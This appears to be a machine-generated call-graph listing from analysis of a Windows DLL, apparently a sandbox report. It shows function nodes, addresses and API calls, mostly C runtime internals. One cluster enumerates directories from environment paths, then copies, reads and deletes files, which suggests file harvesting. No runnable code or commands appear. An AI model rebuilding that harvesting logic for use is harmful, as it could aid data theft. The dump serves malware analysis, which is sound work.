7778 22796368 __dosmaperr 20 API calls 7777->7778 7779 22798554 7777->7779 7781 2279857a 7778->7781 7780->7777 7780->7779 7783 2279858b 7780->7783 7782 227962ac _abort 26 API calls 7781->7782 7782->7779 7783->7779 7784 22796368 __dosmaperr 20 API calls 7783->7784 7784->7781 7785 227965ec 7790 227967bf 7785->7790 7788 2279571e _free 20 API calls 7789 227965ff 7788->7789 7795 227967f4 7790->7795 7792 227965f6 7792->7788 7794 2279571e _free 20 API calls 7794->7792 7796 22796806 7795->7796 7800 227967cd 7795->7800 7797 2279680b 7796->7797 7799 22796836 7796->7799 7798 2279637b _abort 20 API calls 7797->7798 7801 22796814 7798->7801 7799->7800 7806 227971d6 7799->7806 7800->7792 7800->7794 7803 2279571e _free 20 API calls 7801->7803 7803->7800 7804 22796851 7805 2279571e _free 20 API calls 7804->7805 7805->7800 7807 227971e1 7806->7807 7808 22797209 7807->7808 7809 227971fa 7807->7809 7810 22797218 7808->7810 7815 22798a98 7808->7815 7811 22796368 __dosmaperr 20 API calls 7809->7811 7822 22798acb 7810->7822 7814 227971ff ___scrt_fastfail 7811->7814 7814->7804 7816 22798ab8 RtlSizeHeap 7815->7816 7817 22798aa3 7815->7817 7816->7810 7818 22796368 __dosmaperr 20 API calls 7817->7818 7819 22798aa8 7818->7819 7820 227962ac _abort 26 API calls 7819->7820 7821 22798ab3 7820->7821 7821->7810 7823 22798ad8 7822->7823 7824 22798ae3 7822->7824 7826 227956d0 21 API calls 7823->7826 7825 22798aeb 7824->7825 7832 22798af4 _abort 7824->7832 7827 2279571e _free 20 API calls 7825->7827 7830 22798ae0 7826->7830 7827->7830 7828 22798af9 7831 22796368 __dosmaperr 20 API calls 7828->7831 7829 22798b1e RtlReAllocateHeap 7829->7830 7829->7832 7830->7814 7831->7830 7832->7828 7832->7829 7833 2279474f _abort 7 API calls 7832->7833 7833->7832 6286 2279506f 6287 22795087 6286->6287 6288 22795081 6286->6288 6290 22795000 6288->6290 6294 2279500d 6290->6294 6295 2279502a 6290->6295 6291 22795024 6293 2279571e _free 20 API calls 6291->6293 6292 2279571e _free 20 API calls 6292->6294 6293->6295 6294->6291 6294->6292 6295->6287 7834 2279a1e0 7837 2279a1fe 7834->7837 7836 2279a1f6 7838 2279a203 7837->7838 7839 2279a298 7838->7839 7840 2279aa53 21 API calls 7838->7840 7839->7836 7841 2279a42f 7840->7841 7841->7836 6296 22796664 6297 22796675 6296->6297 6298 22792ada _ValidateLocalCookies 5 API calls 6297->6298 6299 22796701 6298->6299 5971 22791c5b 5972 22791c6b ___scrt_fastfail 5971->5972 5975 227912ee 5972->5975 5974 22791c87 5976 22791324 ___scrt_fastfail 5975->5976 5977 227913b7 GetEnvironmentVariableW 5976->5977 6001 227910f1 5977->6001 5980 227910f1 57 API calls 5981 22791465 5980->5981 5982 227910f1 57 API calls 5981->5982 5983 22791479 5982->5983 5984 227910f1 57 API calls 5983->5984 5985 2279148d 5984->5985 5986 227910f1 57 API calls 5985->5986 5987 227914a1 5986->5987 5988 227910f1 57 API calls 5987->5988 5989 227914b5 lstrlenW 5988->5989 5990 227914d9 lstrlenW 5989->5990 5991 227914d2 5989->5991 5992 227910f1 57 API calls 5990->5992 5991->5974 5993 22791501 lstrlenW lstrcatW 5992->5993 5994 227910f1 57 API calls 5993->5994 5995 22791539 lstrlenW lstrcatW 5994->5995 5996 227910f1 57 API calls 5995->5996 5997 2279156b lstrlenW lstrcatW 5996->5997 5998 227910f1 57 API calls 5997->5998 5999 2279159d lstrlenW lstrcatW 5998->5999 6000 227910f1 57 API calls 5999->6000 6000->5991 6002 22791118 ___scrt_fastfail 6001->6002 6003 22791129 lstrlenW 6002->6003 6014 22792c40 6003->6014 6005 22791148 lstrcatW lstrlenW 6006 22791168 lstrlenW 6005->6006 6007 22791177 lstrlenW FindFirstFileW 6005->6007 6006->6007 6008 227911e1 6007->6008 6009 227911a0 6007->6009 6008->5980 6010 227911aa 6009->6010 6011 227911c7 FindNextFileW 6009->6011 6010->6011 6016 22791000 6010->6016 6011->6009 6013 227911da FindClose 6011->6013 6013->6008 6015 22792c57 6014->6015 6015->6005 6015->6015 6017 22791022 ___scrt_fastfail 6016->6017 6018 227910af 6017->6018 6019 2279102f lstrcatW lstrlenW 6017->6019 6020 227910b5 lstrlenW 6018->6020 6031 227910ad 6018->6031 6021 2279106b lstrlenW 6019->6021 6022 2279105a lstrlenW 6019->6022 6047 22791e16 6020->6047 6033 22791e89 lstrlenW 6021->6033 6022->6021 6025 22791088 GetFileAttributesW 6027 2279109c 6025->6027 6025->6031 6026 227910ca 6028 22791e89 5 API calls 6026->6028 6026->6031 6027->6031 6039 2279173a 6027->6039 6030 227910df 6028->6030 6052 227911ea 6030->6052 6031->6010 6034 22792c40 ___scrt_fastfail 6033->6034 6035 22791ea7 lstrcatW lstrlenW 6034->6035 6036 22791ed1 lstrcatW 6035->6036 6037 22791ec2 6035->6037 6036->6025 6037->6036 6038 22791ec7 lstrlenW 6037->6038 6038->6036 6040 22791747 ___scrt_fastfail 6039->6040 6067 22791cca 6040->6067 6044 2279199f 6044->6031 6045 22791824 ___scrt_fastfail _strlen 6045->6044 6087 227915da 6045->6087 6048 22791e29 6047->6048 6051 22791e4c 6047->6051 6049 22791e2d lstrlenW 6048->6049 6048->6051 6050 22791e3f lstrlenW 6049->6050 6049->6051 6050->6051 6051->6026 6053 2279120e ___scrt_fastfail 6052->6053 6054 22791e89 5 API calls 6053->6054 6055 22791220 GetFileAttributesW 6054->6055 6056 22791235 6055->6056 6057 22791246 6055->6057 6056->6057 6060 2279173a 35 API calls 6056->6060 6058 22791e89 5 API calls 6057->6058 6059 22791258 6058->6059 6061 227910f1 56 API calls 6059->6061 6060->6057 6062 2279126d 6061->6062 6063 22791e89 5 API calls 6062->6063 6064 2279127f ___scrt_fastfail 6063->6064 6065 227910f1 56 API calls 6064->6065 6066 227912e6 6065->6066 6066->6031 6068 22791cf1 ___scrt_fastfail 6067->6068 6069 22791d0f CopyFileW CreateFileW 6068->6069 6070 22791d55 GetFileSize 6069->6070 6071 22791d44 DeleteFileW 6069->6071 6073 22791ede 22 API calls 6070->6073 6072 22791808 6071->6072 6072->6044 6077 22791ede 6072->6077 6074 22791d66 ReadFile 6073->6074 6075 22791d7d CloseHandle DeleteFileW 6074->6075 6076 22791d94 CloseHandle DeleteFileW 6074->6076 6075->6072 6076->6072 6079 2279222f 6077->6079 6080 2279224e 6079->6080 6082 22792250 6079->6082 6095 2279474f 6079->6095 6100 227947e5 6079->6100 6080->6045 6083 22792908 6082->6083 6107 227935d2 6082->6107 6084 227935d2 __CxxThrowException@8 RaiseException 6083->6084 6086 22792925 6084->6086 6086->6045 6088 2279160c _strcat _strlen 6087->6088 6089 2279163c lstrlenW 6088->6089 6195 22791c9d 6089->6195 6091 22791655 lstrcatW lstrlenW 6092 22791678 6091->6092 6093 2279167e lstrcatW 6092->6093 6094 22791693 ___scrt_fastfail 6092->6094 6093->6094 6094->6045 6110 22794793 6095->6110 6098 2279478f 6098->6079 6099 22794765 6116 22792ada 6099->6116 6105 227956d0 _abort 6100->6105 6101 2279570e 6129 22796368 6101->6129 6103 227956f9 RtlAllocateHeap 6104 2279570c 6103->6104 6103->6105 6104->6079 6105->6101 6105->6103 6106 2279474f _abort 7 API calls 6105->6106 6106->6105 6109 227935f2 RaiseException 6107->6109 6109->6083 6111 2279479f ___DestructExceptionObject 6110->6111 6123 22795671 RtlEnterCriticalSection 6111->6123 6113 227947aa 6124 227947dc 6113->6124 6115 227947d1 _abort 6115->6099 6117 22792ae3 6116->6117 6118 22792ae5 IsProcessorFeaturePresent 6116->6118 6117->6098 6120 22792b58 6118->6120 6128 22792b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6120->6128 6122 22792c3b 6122->6098 6123->6113 6127 227956b9 RtlLeaveCriticalSection 6124->6127 6126 227947e3 6126->6115 6127->6126 6128->6122 6132 22795b7a GetLastError 6129->6132 6133 22795b99 6132->6133 6134 22795b93 6132->6134 6138 22795bf0 SetLastError 6133->6138 6158 2279637b 6133->6158 6151 22795e08 6134->6151 6140 22795bf9 6138->6140 6139 22795bb3 6165 2279571e 6139->6165 6140->6104 6144 22795bb9 6146 22795be7 SetLastError 6144->6146 6145 22795bcf 6178 2279593c 6145->6178 6146->6140 6149 2279571e _free 17 API calls 6150 22795be0 6149->6150 6150->6138 6150->6146 6183 22795c45 6151->6183 6153 22795e2f 6154 22795e47 TlsGetValue 6153->6154 6155 22795e3b 6153->6155 6154->6155 6156 22792ada _ValidateLocalCookies 5 API calls 6155->6156 6157 22795e58 6156->6157 6157->6133 6163 22796388 _abort 6158->6163 6159 227963c8 6162 22796368 __dosmaperr 19 API calls 6159->6162 6160 227963b3 RtlAllocateHeap 6161 22795bab 6160->6161 6160->6163 6161->6139 6171 22795e5e 6161->6171 6162->6161 6163->6159 6163->6160 6164 2279474f _abort 7 API calls 6163->6164 6164->6163 6166 22795729 HeapFree 6165->6166 6170 22795752 __dosmaperr 6165->6170 6167 2279573e 6166->6167 6166->6170 6168 22796368 __dosmaperr 18 API calls 6167->6168 6169 22795744 GetLastError 6168->6169 6169->6170 6170->6144 6172 22795c45 _abort 5 API calls 6171->6172 6173 22795e85 6172->6173 6174 22795ea0 TlsSetValue 6173->6174 6175 22795e94 6173->6175 6174->6175 6176 22792ada _ValidateLocalCookies 5 API calls 6175->6176 6177 22795bc8 6176->6177 6177->6139 6177->6145 6189 22795914 6178->6189 6184 22795c75 __crt_fast_encode_pointer 6183->6184 6185 22795c71 6183->6185 6184->6153 6185->6184 6186 22795ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6185->6186 6188 22795c95 6185->6188 6186->6185 6187 22795ca1 GetProcAddress 6187->6184 6188->6184 6188->6187 6190 22795854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6189->6190 6191 22795938 6190->6191 6192 227958c4 6191->6192 6193 22795758 _abort 20 API calls 6192->6193 6194 227958e8 6193->6194 6194->6149 6196 22791ca6 _strlen 6195->6196 6196->6091 6859 227920db 6860 227920e7 ___DestructExceptionObject 6859->6860 6861 22792110 dllmain_raw 6860->6861 6866 2279210b 6860->6866 6870 227920f6 6860->6870 6862 2279212a 6861->6862 6861->6870 6872 22791eec 6862->6872 6864 22792177 6865 22791eec 31 API calls 6864->6865 6864->6870 6867 2279218a 6865->6867 6866->6864 6869 22791eec 31 API calls 6866->6869 6866->6870 6868 22792193 dllmain_raw 6867->6868 6867->6870 6868->6870 6871 2279216d dllmain_raw 6869->6871 6871->6864 6873 22791f2a dllmain_crt_process_detach 6872->6873 6874 22791ef7 6872->6874 6880 22791f06 6873->6880 6875 22791f1c dllmain_crt_process_attach 6874->6875 6876 22791efc 6874->6876 6875->6880 6877 22791f01 6876->6877 6878 22791f12 6876->6878 6877->6880 6882 2279240b 6877->6882 6887 227923ec 6878->6887 6880->6866 6895 227953e5 6882->6895 6993 22793513 6887->6993 6890 227923f5 6890->6880 6893 22792408 6893->6880 6894 2279351e 7 API calls 6894->6890 6901 22795aca 6895->6901 6898 2279351e 6977 22793820 6898->6977 6900 22792415 6900->6880 6902 22795ad4 6901->6902 6905 22792410 6901->6905 6903 22795e08 _abort 11 API calls 6902->6903 6904 22795adb 6903->6904 6904->6905 6906 22795e5e _abort 11 API calls 6904->6906 6905->6898 6907 22795aee 6906->6907 6909 227959b5 6907->6909 6910 227959c0 6909->6910 6911 227959d0 6909->6911 6915 227959d6 6910->6915 6911->6905 6914 2279571e _free 20 API calls 6914->6911 6916 227959e9 6915->6916 6917 227959ef 6915->6917 6919 2279571e _free 20 API calls 6916->6919 6918 2279571e _free 20 API calls 6917->6918 6920 227959fb 6918->6920 6919->6917 6921 2279571e _free 20 API calls 6920->6921 6922 22795a06 6921->6922 6923 2279571e _free 20 API calls 6922->6923 6924 22795a11 6923->6924 6925 2279571e _free 20 API calls 6924->6925 6926 22795a1c 6925->6926 6927 2279571e _free 20 API calls 6926->6927 6928 22795a27 6927->6928 6929 2279571e _free 20 API calls 6928->6929 6930 22795a32 6929->6930 6931 2279571e _free 20 API calls 6930->6931 6932 22795a3d 6931->6932 6933 2279571e _free 20 API calls 6932->6933 6934 22795a48 6933->6934 6935 2279571e _free 20 API calls 6934->6935 6936 22795a56 6935->6936 6941 2279589c 6936->6941 6947 227957a8 6941->6947 6943 227958c0 6944 227958ec 6943->6944 6960 22795809 6944->6960 6946 22795910 6946->6914 6948 227957b4 ___DestructExceptionObject 6947->6948 6955 22795671 RtlEnterCriticalSection 6948->6955 6951 227957be 6952 2279571e _free 20 API calls 6951->6952 6954 227957e8 6951->6954 6952->6954 6953 227957f5 _abort 6953->6943 6956 227957fd 6954->6956 6955->6951 6959 227956b9 RtlLeaveCriticalSection 6956->6959 6958 22795807 6958->6953 6959->6958 6961 22795815 ___DestructExceptionObject 6960->6961 6968 22795671 RtlEnterCriticalSection 6961->6968 6963 2279581f 6969 22795a7f 6963->6969 6965 22795832 6973 22795848 6965->6973 6967 22795840 _abort 6967->6946 6968->6963 6970 22795a8e __fassign 6969->6970 6971 22795ab5 __fassign 6969->6971 6970->6971 6972 22797cc2 __fassign 20 API calls 6970->6972 6971->6965 6972->6971 6976 227956b9 RtlLeaveCriticalSection 6973->6976 6975 22795852 6975->6967 6976->6975 6978 2279382d 6977->6978 6982 2279384b ___vcrt_freefls@4 6977->6982 6979 2279383b 6978->6979 6983 22793b67 6978->6983 6988 22793ba2 6979->6988 6982->6900 6984 22793a82 try_get_function 5 API calls 6983->6984 6985 22793b81 6984->6985 6986 22793b99 TlsGetValue 6985->6986 6987 22793b8d 6985->6987 6986->6987 6987->6979 6989 22793a82 try_get_function 5 API calls 6988->6989 6990 22793bbc 6989->6990 6991 22793bd7 TlsSetValue 6990->6991 6992 22793bcb 6990->6992 6991->6992 6992->6982 6999 22793856 6993->6999 6995 227923f1 6995->6890 6996 227953da 6995->6996 6997 22795b7a __dosmaperr 20 API calls 6996->6997 6998 227923fd 6997->6998 6998->6893 6998->6894 7000 2279385f 6999->7000 7001 22793862 GetLastError 6999->7001 7000->6995 7002 22793b67 ___vcrt_FlsGetValue 6 API calls 7001->7002 7003 22793877 7002->7003 7004 227938dc SetLastError 7003->7004 7005 22793ba2 ___vcrt_FlsSetValue 6 API calls 7003->7005 7010 22793896 7003->7010 7004->6995 7006 22793890 7005->7006 7007 227938b8 7006->7007 7009 22793ba2 ___vcrt_FlsSetValue 6 API calls 7006->7009 7006->7010 7008 22793ba2 ___vcrt_FlsSetValue 6 API calls 7007->7008 7007->7010 7008->7010 7009->7007 7010->7004 7842 22794bdd 7843 22794c08 7842->7843 7844 22794bec 7842->7844 7845 22796d60 51 API calls 7843->7845 7844->7843 7846 22794bf2 7844->7846 7847 22794c0f GetModuleFileNameA 7845->7847 7848 22796368 __dosmaperr 20 API calls 7846->7848 7849 22794c33 7847->7849 7850 22794bf7 7848->7850 7865 22794d01 7849->7865 7851 227962ac _abort 26 API calls 7850->7851 7853 22794c01 7851->7853 7857 22794c72 7860 22794d01 38 API calls 7857->7860 7858 22794c66 7859 22796368 __dosmaperr 20 API calls 7858->7859 7864 22794c6b 7859->7864 7861 22794c88 7860->7861 7863 2279571e _free 20 API calls 7861->7863 7861->7864 7862 2279571e _free 20 API calls 7862->7853 7863->7864 7864->7862 7867 22794d26 7865->7867 7869 22794d86 7867->7869 7877 227970eb 7867->7877 7868 22794c50 7871 22794e76 7868->7871 7869->7868 7870 227970eb 38 API calls 7869->7870 7870->7869 7872 22794e8b 7871->7872 7873 22794c5d 7871->7873 7872->7873 7874 2279637b _abort 20 API calls 7872->7874 7873->7857 7873->7858 7875 22794eb9 7874->7875 7876 2279571e _free 20 API calls 7875->7876 7876->7873 7880 22797092 7877->7880 7881 227954a7 __fassign 38 API calls 7880->7881 7882 227970a6 7881->7882 7882->7867 7276 22795351 7277 22795374 7276->7277 7278 22795360 7276->7278 7279 2279571e _free 20 API calls 7277->7279 7278->7277 7281 2279571e _free 20 API calls 7278->7281 7280 22795386 7279->7280 7282 2279571e _free 20 API calls 7280->7282 7281->7277 7283 22795399 7282->7283 7284 2279571e _free 20 API calls 7283->7284 7285 227953aa 7284->7285 7286 2279571e _free 20 API calls 7285->7286 7287 227953bb 7286->7287 7011 227936d0 7012 227936e2 7011->7012 7014 227936f0 @_EH4_CallFilterFunc@8 7011->7014 7013 22792ada _ValidateLocalCookies 5 API calls 7012->7013 7013->7014 7015 227966d5 7016 227966e1 7015->7016 7017 227966eb FindClose 7016->7017 7018 227966f2 7016->7018 7017->7018 7019 22792ada _ValidateLocalCookies 5 API calls 7018->7019 7020 22796701 7019->7020 7883 227973d5 7884 227973e1 ___DestructExceptionObject 7883->7884 7895 22795671 RtlEnterCriticalSection 7884->7895 7886 227973e8 7896 22798be3 7886->7896 7888 227973f7 7894 22797406 7888->7894 7909 22797269 GetStartupInfoW 7888->7909 7892 22797417 _abort 7920 22797422 7894->7920 7895->7886 7897 22798bef ___DestructExceptionObject 7896->7897 7898 22798bfc 7897->7898 7899 22798c13 7897->7899 7901 22796368 __dosmaperr 20 API calls 7898->7901 7923 22795671 RtlEnterCriticalSection 7899->7923 7902 22798c01 7901->7902 7903 227962ac _abort 26 API calls 7902->7903 7906 22798c0b _abort 7903->7906 7904 22798c1f 7908 22798c4b 7904->7908 7924 22798b34 7904->7924 7906->7888 7931 22798c72 7908->7931 7910 22797318 7909->7910 7911 22797286 7909->7911 7915 2279731f 7910->7915 7911->7910 7912 22798be3 27 API calls 7911->7912 7913 227972af 7912->7913 7913->7910 7914 227972dd GetFileType 7913->7914 7914->7913 7916 22797326 7915->7916 7917 22797369 GetStdHandle 7916->7917 7918 227973d1 7916->7918 7919 2279737c GetFileType 7916->7919 7917->7916 7918->7894 7919->7916 7935 227956b9 RtlLeaveCriticalSection 7920->7935 7922 22797429 7922->7892 7923->7904 7925 2279637b _abort 20 API calls 7924->7925 7930 22798b46 7925->7930 7926 22798b53 7927 2279571e _free 20 API calls 7926->7927 7929 22798ba5 7927->7929 7928 22795eb7 11 API calls 7928->7930 7929->7904 7930->7926 7930->7928 7934 227956b9 RtlLeaveCriticalSection 7931->7934 7933 22798c79 7933->7906 7934->7933 7935->7922 7021 22794ed7 7032 22796d60 7021->7032 7026 22794ef4 7028 2279571e _free 20 API calls 7026->7028 7029 22794f29 7028->7029 7030 22794eff 7031 2279571e _free 20 API calls 7030->7031 7031->7026 7033 22796d69 7032->7033 7035 22794ee9 7032->7035 7065 22796c5f 7033->7065 7036 22797153 GetEnvironmentStringsW 7035->7036 7037 2279716a 7036->7037 7047 227971bd 7036->7047 7038 22797170 WideCharToMultiByte 7037->7038 7041 2279718c 7038->7041 7038->7047 7039 22794eee 7039->7026 7048 22794f2f 7039->7048 7040 227971c6 FreeEnvironmentStringsW 7040->7039 7042 227956d0 21 API calls 7041->7042 7043 22797192 7042->7043 7044 22797199 WideCharToMultiByte 7043->7044 7045 227971af 7043->7045 7044->7045 7046 2279571e _free 20 API calls 7045->7046 7046->7047 7047->7039 7047->7040 7049 22794f44 7048->7049 7050 2279637b _abort 20 API calls 7049->7050 7051 22794f6b 7050->7051 7052 22794fcf 7051->7052 7055 2279637b _abort 20 API calls 7051->7055 7056 22794fd1 7051->7056 7058 2279544d ___std_exception_copy 26 API calls 7051->7058 7061 22794ff3 7051->7061 7063 2279571e _free 20 API calls 7051->7063 7053 2279571e _free 20 API calls 7052->7053 7054 22794fe9 7053->7054 7054->7030 7055->7051 7057 22795000 20 API calls 7056->7057 7059 22794fd7 7057->7059 7058->7051 7060 2279571e _free 20 API calls 7059->7060 7060->7052 7062 227962bc _abort 11 API calls 7061->7062 7064 22794fff 7062->7064 7063->7051 7066 22795af6 _abort 38 API calls 7065->7066 7067 22796c6c 7066->7067 7068 22796d7e __fassign 38 API calls 7067->7068 7069 22796c74 7068->7069 7085 227969f3 7069->7085 7072 22796c8b 7072->7035 7075 22796cce 7078 2279571e _free 20 API calls 7075->7078 7078->7072 7079 22796cc9 7080 22796368 __dosmaperr 20 API calls 7079->7080 7080->7075 7081 22796d12 7081->7075 7109 227968c9 7081->7109 7082 22796ce6 7082->7081 7083 2279571e _free 20 API calls 7082->7083 7083->7081 7086 227954a7 __fassign 38 API calls 7085->7086 7087 22796a05 7086->7087 7088 22796a14 GetOEMCP 7087->7088 7089 22796a26 7087->7089 7091 22796a3d 7088->7091 7090 22796a2b GetACP 7089->7090 7089->7091 7090->7091 7091->7072 7092 227956d0 7091->7092 7093 2279570e 7092->7093 7097 227956de _abort 7092->7097 7094 22796368 __dosmaperr 20 API calls 7093->7094 7096 2279570c 7094->7096 7095 227956f9 RtlAllocateHeap 7095->7096 7095->7097 7096->7075 7099 22796e20 7096->7099 7097->7093 7097->7095 7098 2279474f _abort 7 API calls 7097->7098 7098->7097 7100 227969f3 40 API calls 7099->7100 7101 22796e3f 7100->7101 7104 22796e90 IsValidCodePage 7101->7104 7106 22796e46 7101->7106 7108 22796eb5 ___scrt_fastfail 7101->7108 7102 22792ada _ValidateLocalCookies 5 API calls 7103 22796cc1 7102->7103 7103->7079 7103->7082 7105 22796ea2 GetCPInfo 7104->7105 7104->7106 7105->7106 7105->7108 7106->7102 7112 22796acb GetCPInfo 7108->7112 7185 22796886 7109->7185 7111 227968ed 7111->7075 7118 22796b05 7112->7118 7121 22796baf 7112->7121 7115 22792ada _ValidateLocalCookies 5 API calls 7117 22796c5b 7115->7117 7117->7106 7122 227986e4 7118->7122 7120 22798a3e 43 API calls 7120->7121 7121->7115 7123 227954a7 __fassign 38 API calls 7122->7123 7124 22798704 MultiByteToWideChar 7123->7124 7126 22798742 7124->7126 7133 227987da 7124->7133 7128 22798763 ___scrt_fastfail 7126->7128 7129 227956d0 21 API calls 7126->7129 7127 22792ada _ValidateLocalCookies 5 API calls 7130 22796b66 7127->7130 7131 227987d4 7128->7131 7134 227987a8 MultiByteToWideChar 7128->7134 7129->7128 7136 22798a3e 7130->7136 7141 22798801 7131->7141 7133->7127 7134->7131 7135 227987c4 GetStringTypeW 7134->7135 7135->7131 7137 227954a7 __fassign 38 API calls 7136->7137 7138 22798a51 7137->7138 7145 22798821 7138->7145 7142 2279880d 7141->7142 7143 2279881e 7141->7143 7142->7143 7144 2279571e _free 20 API calls 7142->7144 7143->7133 7144->7143 7146 2279883c 7145->7146 7147 22798862 MultiByteToWideChar 7146->7147 7148 22798a16 7147->7148 7149 2279888c 7147->7149 7150 22792ada _ValidateLocalCookies 5 API calls 7148->7150 7152 227956d0 21 API calls 7149->7152 7155 227988ad 7149->7155 7151 22796b87 7150->7151 7151->7120 7152->7155 7153 22798962 7158 22798801 __freea 20 API calls 7153->7158 7154 227988f6 MultiByteToWideChar 7154->7153 7156 2279890f 7154->7156 7155->7153 7155->7154 7172 22795f19 7156->7172 7158->7148 7160 22798939 7160->7153 7164 22795f19 11 API calls 7160->7164 7161 22798971 7162 227956d0 21 API calls 7161->7162 7167 22798992 7161->7167 7162->7167 7163 22798a07 7166 22798801 __freea 20 API calls 7163->7166 7164->7153 7165 22795f19 11 API calls 7168 227989e6 7165->7168 7166->7153 7167->7163 7167->7165 7168->7163 7169 227989f5 WideCharToMultiByte 7168->7169 7169->7163 7170 22798a35 7169->7170 7171 22798801 __freea 20 API calls 7170->7171 7171->7153 7173 22795c45 _abort 5 API calls 7172->7173 7174 22795f40 7173->7174 7177 22795f49 7174->7177 7180 22795fa1 7174->7180 7178 22792ada _ValidateLocalCookies 5 API calls 7177->7178 7179 22795f9b 7178->7179 7179->7153 7179->7160 7179->7161 7181 22795c45 _abort 5 API calls 7180->7181 7182 22795fc8 7181->7182 7183 22792ada _ValidateLocalCookies 5 API calls 7182->7183 7184 22795f89 LCMapStringW 7183->7184 7184->7177 7186 22796892 ___DestructExceptionObject 7185->7186 7193 22795671 RtlEnterCriticalSection 7186->7193 7188 2279689c 7194 227968f1 7188->7194 7192 227968b5 _abort 7192->7111 7193->7188 7206 22797011 7194->7206 7196 2279693f 7197 22797011 26 API calls 7196->7197 7198 2279695b 7197->7198 7199 22797011 26 API calls 7198->7199 7200 22796979 7199->7200 7201 227968a9 7200->7201 7202 2279571e _free 20 API calls 7200->7202 7203 227968bd 7201->7203 7202->7201 7220 227956b9 RtlLeaveCriticalSection 7203->7220 7205 227968c7 7205->7192 7207 22797022 7206->7207 7216 2279701e 7206->7216 7208 22797029 7207->7208 7211 2279703c ___scrt_fastfail 7207->7211 7209 22796368 __dosmaperr 20 API calls 7208->7209 7210 2279702e 7209->7210 7212 227962ac _abort 26 API calls 7210->7212 7213 2279706a 7211->7213 7214 22797073 7211->7214 7211->7216 7212->7216 7215 22796368 __dosmaperr 20 API calls 7213->7215 7214->7216 7218 22796368 __dosmaperr 20 API calls 7214->7218 7217 2279706f 7215->7217 7216->7196 7219 227962ac _abort 26 API calls 7217->7219 7218->7217 7219->7216 7220->7205 6300 22792049 6301 22792055 ___DestructExceptionObject 6300->6301 6302 2279207d 6301->6302 6303 227920d3 6301->6303 6313 2279205e 6301->6313 6314 2279244c 6302->6314 6335 22792639 IsProcessorFeaturePresent 6303->6335 6306 22792082 6323 22792308 6306->6323 6307 227920da 6309 22792087 __RTC_Initialize 6326 227920c4 6309->6326 6311 2279209f 6329 2279260b 6311->6329 6315 22792451 ___scrt_release_startup_lock 6314->6315 6316 22792455 6315->6316 6319 22792461 6315->6319 6339 2279527a 6316->6339 6320 2279246e 6319->6320 6342 2279499b 6319->6342 6320->6306 6421 227934c7 RtlInterlockedFlushSList 6323->6421 6325 22792312 6325->6309 6423 2279246f 6326->6423 6328 227920c9 ___scrt_release_startup_lock 6328->6311 6330 22792617 6329->6330 6334 2279262d 6330->6334 6464 227953ed 6330->6464 6334->6313 6336 2279264e ___scrt_fastfail 6335->6336 6337 227926f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6336->6337 6338 22792744 ___scrt_fastfail 6337->6338 6338->6307 6364 22795132 6339->6364 6343 227949a7 _abort 6342->6343 6352 227949bf 6343->6352 6386 22794af5 GetModuleHandleW 6343->6386 6347 22794a65 6400 22794aa5 6347->6400 6351 22794a3c 6356 22794a54 6351->6356 6396 22794669 6351->6396 6395 22795671 RtlEnterCriticalSection 6352->6395 6353 227949c7 6353->6347 6353->6351 6359 2279527a _abort 20 API calls 6353->6359 6354 22794aae 6411 2279bdc9 6354->6411 6355 22794a82 6403 22794ab4 6355->6403 6357 22794669 _abort 5 API calls 6356->6357 6357->6347 6359->6351 6367 227950e1 6364->6367 6366 2279245f 6366->6306 6368 227950ed ___DestructExceptionObject 6367->6368 6375 22795671 RtlEnterCriticalSection 6368->6375 6370 227950fb 6376 2279515a 6370->6376 6374 22795119 _abort 6374->6366 6375->6370 6379 22795182 6376->6379 6380 2279517a 6376->6380 6377 22792ada _ValidateLocalCookies 5 API calls 6378 22795108 6377->6378 6382 22795126 6378->6382 6379->6380 6381 2279571e _free 20 API calls 6379->6381 6380->6377 6381->6380 6385 227956b9 RtlLeaveCriticalSection 6382->6385 6384 22795130 6384->6374 6385->6384 6387 227949b3 6386->6387 6387->6352 6388 22794b39 GetModuleHandleExW 6387->6388 6389 22794b63 GetProcAddress 6388->6389 6390 22794b78 6388->6390 6389->6390 6391 22794b8c FreeLibrary 6390->6391 6392 22794b95 6390->6392 6391->6392 6393 22792ada _ValidateLocalCookies 5 API calls 6392->6393 6394 22794b9f 6393->6394 6394->6352 6395->6353 6397 22794698 6396->6397 6398 22792ada _ValidateLocalCookies 5 API calls 6397->6398 6399 227946c1 6398->6399 6399->6356 6414 227956b9 RtlLeaveCriticalSection 6400->6414 6402 22794a7e 6402->6354 6402->6355 6415 22796025 6403->6415 6406 22794ae2 6409 22794b39 _abort 8 API calls 6406->6409 6407 22794ac2 GetPEB 6407->6406 6408 22794ad2 GetCurrentProcess TerminateProcess 6407->6408 6408->6406 6410 22794aea ExitProcess 6409->6410 6412 22792ada _ValidateLocalCookies 5 API calls 6411->6412 6413 2279bdd4 6412->6413 6413->6413 6414->6402 6416 2279604a 6415->6416 6418 22796040 6415->6418 6417 22795c45 _abort 5 API calls 6416->6417 6417->6418 6419 22792ada _ValidateLocalCookies 5 API calls 6418->6419 6420 22794abe 6419->6420 6420->6406 6420->6407 6422 227934d7 6421->6422 6422->6325 6428 227953ff 6423->6428 6435 22795c2b 6428->6435 6431 2279391b 6432 2279354d 6431->6432 6433 22793925 6431->6433 6432->6328 6446 22793b2c 6433->6446 6436 22792476 6435->6436 6437 22795c35 6435->6437 6436->6431 6439 22795db2 6437->6439 6440 22795c45 _abort 5 API calls 6439->6440 6441 22795dd9 6440->6441 6442 22795df1 TlsFree 6441->6442 6445 22795de5 6441->6445 6442->6445 6443 22792ada _ValidateLocalCookies 5 API calls 6444 22795e02 6443->6444 6444->6436 6445->6443 6451 22793a82 6446->6451 6448 22793b46 6449 22793b5e TlsFree 6448->6449 6450 22793b52 6448->6450 6449->6450 6450->6432 6452 22793aaa 6451->6452 6453 22793aa6 __crt_fast_encode_pointer 6451->6453 6452->6453 6457 227939be 6452->6457 6453->6448 6456 22793ac4 GetProcAddress 6456->6453 6462 227939cd try_get_first_available_module 6457->6462 6458 22793a77 6458->6453 6458->6456 6459 227939ea LoadLibraryExW 6460 22793a05 GetLastError 6459->6460 6459->6462 6460->6462 6461 22793a60 FreeLibrary 6461->6462 6462->6458 6462->6459 6462->6461 6463 22793a38 LoadLibraryExW 6462->6463 6463->6462 6475 227974da 6464->6475 6467 22793529 6468 22793532 6467->6468 6469 22793543 6467->6469 6470 2279391b ___vcrt_uninitialize_ptd 6 API calls 6468->6470 6469->6334 6471 22793537 6470->6471 6479 22793972 6471->6479 6476 227974f3 